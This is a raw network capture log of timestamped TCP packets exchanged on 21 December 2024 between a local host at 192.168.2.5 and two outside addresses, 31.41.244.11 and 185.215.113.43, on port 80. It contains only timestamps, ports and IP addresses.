                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.915112019 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.915158987 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.915254116 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.915333986 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.916204929 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.916248083 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.916320086 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.916367054 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.917315960 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.917381048 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.917409897 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.917457104 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.918411970 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.918464899 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.918509007 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.918545008 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.919492006 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.919536114 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.919605970 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.919648886 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.920641899 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.920685053 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.920774937 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.920816898 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.921686888 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.921736956 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.921780109 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.921819925 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.922784090 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.922827959 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.922900915 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.922943115 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.923892021 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.923934937 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.924071074 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.924113035 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.924951077 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:24.924993038 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.059510946 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.059654951 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.059717894 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.060024977 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.060071945 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.060142040 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.060223103 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.061126947 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.061255932 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.061305046 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.062256098 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.062299967 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.062352896 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.063329935 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.063405991 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.063455105 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.064470053 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.064579964 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.064625978 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.065547943 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.065598011 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.065613031 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.065665960 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.066678047 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.066750050 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.066795111 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.067756891 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.067804098 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.067887068 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.067931890 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.068866014 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.068929911 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.068977118 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.069926977 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.069973946 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.070035934 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.070316076 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.071016073 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.071106911 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.071151018 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.072134972 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.072206974 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.072248936 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.073286057 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.073355913 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.073399067 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.073539972 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.074333906 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.074451923 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.074501038 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.075387001 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:25.075654030 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.303709030 CET4985280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.304266930 CET4987180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.423613071 CET8049852185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.423675060 CET4985280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.423748016 CET8049871185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.423810005 CET4987180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.424300909 CET4987180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.543725014 CET8049871185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.782670975 CET8049871185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.782876968 CET4987180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.785517931 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.785890102 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.905348063 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.905392885 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.905474901 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.905535936 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.915137053 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:29.034845114 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236027002 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236043930 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236059904 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236077070 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236100912 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236103058 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236119986 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236160994 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236160994 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236175060 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236273050 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236309052 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236355066 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236368895 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236383915 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236396074 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236413002 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236422062 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.355772018 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.355801105 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.355885029 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.359884977 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.359946966 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.360006094 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.360337019 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.428220987 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.428282976 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.428433895 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.428487062 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.432322025 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.432367086 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.432424068 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.432585955 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.440701008 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.440788984 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.443737984 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.443787098 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.443857908 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.443905115 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.452096939 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.452153921 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.452200890 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.452286005 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.460491896 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.460558891 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.460589886 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.460654020 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.468890905 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.468991041 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.469042063 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.469089031 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.477236032 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.477288008 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.477335930 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.477543116 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.485600948 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.485661983 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.485707998 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.485774040 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.493987083 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.494168043 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.494242907 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.502341986 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.502458096 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.502523899 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.509591103 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.509768963 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.509857893 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.516824007 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.520605087 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.641707897 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.641771078 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.641797066 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.641901970 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.643058062 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.643110037 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.643115997 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.643254042 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.647778034 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.647803068 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.647938013 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.647938013 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.652175903 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.652230024 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.652281046 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.652331114 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.656735897 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.656791925 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.656847000 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.656912088 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.661286116 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.661360979 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.661406040 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.662487984 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.665870905 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.665936947 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.665982962 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.666044950 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.670408010 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.670494080 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.670555115 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.670603991 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.675015926 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.675066948 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.675087929 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.675134897 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.679548025 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.679616928 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.679656982 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.679702044 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.684077024 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.684170008 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.684227943 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.688671112 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.688803911 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.688851118 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.693916082 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.693938971 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.693989038 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.698364019 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.698548079 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.698597908 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.702876091 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.703028917 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.703074932 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.707515001 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.707531929 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.707573891 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.707607985 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.711411953 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.711529016 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.711581945 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.716006041 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.716211081 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.716289997 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.721837044 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.721853971 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.721901894 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.725815058 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.725867987 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.725960016 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.726013899 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.730328083 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.730385065 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.730484009 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.730537891 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.734900951 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.734918118 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.734951019 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.734989882 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.738763094 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.738821983 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.738938093 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.738986015 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.745858908 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.745873928 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.745932102 CET4987380192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.761262894 CET804987331.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.761343956 CET4987380192.168.2.531.41.244.11
